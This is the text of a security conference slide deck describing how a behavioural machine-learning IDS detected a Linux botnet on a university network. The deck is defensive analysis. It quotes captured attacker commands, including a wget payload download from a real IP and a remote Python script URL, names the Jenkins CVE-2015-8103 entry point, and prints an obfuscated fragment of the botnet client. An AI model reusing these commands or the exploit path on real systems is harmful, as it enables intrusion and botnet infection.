Robots against robots: How a Machine Learning IDS detected a novel Linux Botnet
bit.ly/SS-RvR
The Detection
-
January 18th, 2016.
-
Testing Stratosphere IPS in the University network.
-
Have an alert from a malicious behavior in the IDS.
147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]: 88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,
"For a long time there was a periodic connection (freq 5s-60s), to an uncommon port, with large flows of medium duration."
The Analysis: Visibility
-
Argus flow suite from Qosient.
-
Storage of 3,000 hosts continually (1 year ~= 80GB)
-
Back in time!
The Detected Connection
Sent: "+.............P.43.249.81.135.......?."
Recv: ".................................." (MBs)
Recv once: "import time as O000OO0O0O00OO00O"
-
43.249.81.135
-
No VirusTotal detection.
-
AS58879 Shanghai Anchang Network Security Technology Co.,L. China.
-
Last known domain: lyzqmir2.com. Minecraft server.
-
The Begining: Jan 16th, 2016
-
103.242.134.118 port 33333/TCP [VT:7]
-
S:"/bin/sh: 0: can't access tty; job control turned off.$,"
-
S:"tomcat6 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep abcc.$
-
S:"wget 23.247.5.27:435/abcc.c"
-
R:"ps aux |grep abcc.ccd /tmp.m"
-
-
23.247.5.27 port 435/TCP [VT:0]
-
23.247.5.27 port 25000/TCP (main CC)
-
"=...-== Love AV ==-:..Linux 3.2.0-4-amd64"
-
The Analysis
-
103.242.134.118 port 23031/TCP
-
"version:0.1"
-
"heartOK","hearta"
-
"deployOK:115.239.248.88:80:3:60 heartOK"
-
-
103.242.134.118 port 33333/TCP
-
"http://222.179.116.23:8080/theme/1/pys.py"
-
Python script?
-
Our computer Attacking?
-
Hundreds of connections to IPs in China, port 80/UDP.
-
115.239.248.88 port 80/UDP [MoveInternet Network Technology Co.,Ltd.,CN]
-
Few Kb of binary data sent.
-
Could not find a motive or explanation.
-
The Compromise
-
What we knew
-
Tomcat involved.
-
Date range.
-
-
We found strange POSTs to Jenkins minutes before
-
POST /jenkins/descriptor/hudson.model.DownloadService/byId/
hudson.tasks.Maven.MavenInstaller/postBack -
POST /jenkins/ajaxExecutors
-
-
Remote Jenkins code execution vulnerability CVE-2015-8103. Metasploit module.
The Python Botnet Script
import time as O000OO0O0O00OO00O
import math as O000O0OO0O0O00O0O
import socket as OO0000OOOOOO0O000
import os as OO00000000OO000OO
import base64 as O0O0OOOO00O0O00OO
import threading as O00O000000OOO0OO0
import random as O0OOO0O000OO0O00O
class fbiabcd8c (O00O000000OOO0OO0 .Thread ):
def __init__ (O0000O0OOOOOOO0O0 ):
O00O000000OOO0OO0 .Thread .__init__ (O0000O0OOOOOOO0O0 )
def run (O0OO0OOOOO000O000 ):
global SvneciA
global fn023ca
global fABRVUqfh
if (fn023ca ==False ):
return
O00O0O00000OOO0OO =0
while fABRVUqfh :
O00O0O00000OOO0OO +=1
if (SvneciA >=O00O0O00000OOO0OO ):
O000OO0O0O00OO00O .sleep (1 )
else :
break
fABRVUqfh =False
try :
FcANECa .send (O0O0OOOO00O0O00OO .b64decode ("dWRwU3RvcHBlZA=="))
The Python Botnet Script
-
Obfuscated. Deobfuscated by Veronica Valeros. Thx!
-
Threads.
-
C&C channel with 10s timeouts.
-
Receives orders and executes commands, including access to OS.
-
-
Confuse analysts? or DDoS?
-
Function to send random UDP data to IPs received by C&C.
-
How Machine Learning detected this?
Stratosphere IPS
Free
Software
Machine
Learning
Behavioral
IPS
Protecting
NGOs
Stratosphere IPS
-
Model network behaviors as a string of letters.
-
1 flow 3 features 1 letter
Behavior of Connections
Markov Chains Models
-
Create, train and store a Markov Chain models
Behavioral Detection
Trained
Markov Models
Similarity to Unknown Traffic
Conclusion
-
Still unknown and hidden.
-
Could not be detected by usual protections.
-
No fingerprints, no reputations, no rootkits.
-
-
Continuous Visibility is paramount.
-
Behavioral Machine Learning is improving.
Questions? And Thanks!
Sebastian Garcia
sebastian.garcia@agents.fel.cvut.cz
@eldracote
Workshop Malware Traffic: bit.ly/SSdirtywork
Robots against robots: How a Machine Learning IDS detected a novel Linux Botnet
By eldraco
Robots against robots: How a Machine Learning IDS detected a novel Linux Botnet
Presentation about a Linux Botnet analysis for www.security-session.cz
- 11,171